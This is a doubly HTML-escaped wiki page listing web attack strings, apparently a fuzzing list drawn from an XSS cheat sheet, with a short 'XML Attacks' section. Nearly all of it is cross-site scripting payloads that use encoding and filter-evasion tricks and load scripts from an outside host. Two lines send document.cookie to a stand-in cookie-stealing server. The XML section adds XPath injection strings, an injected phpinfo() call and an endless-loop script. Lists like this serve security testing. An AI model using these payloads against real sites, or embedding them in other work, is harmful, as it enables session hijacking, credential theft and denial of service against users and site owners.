&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;&amp;quot;--&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;lt;SCRIPT&amp;gt;alert('XSS')&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;'&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;quot;&amp;lt;SCRI&amp;quot;&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;a href=&amp;quot;&amp;quot;about:&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/style&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;blah&amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;gt;&amp;lt;script&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;script&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;script&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;lt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;ltscript&amp;amp;gtalert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;ltscript&amp;amp;gtalert(document.cookie);&amp;amp;ltscript&amp;amp;gtalert&lt;br /&gt;
&amp;lt;xss&amp;gt;&amp;lt;script&amp;gt;alert('WXSS')&amp;lt;/script&amp;gt;&amp;lt;/vulnerable&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=javascript:alert(&amp;amp;quot;WXSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x09;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x0A;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x0D;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;lt;/script&amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;gt;&amp;lt;/SCRIPT&amp;gt;!--&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;=&amp;amp;{}&lt;br /&gt;
'';!--&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;lt;name&amp;gt;','')); phpinfo(); exit;/*&amp;lt;/name&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('XSS');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&lt;br /&gt;
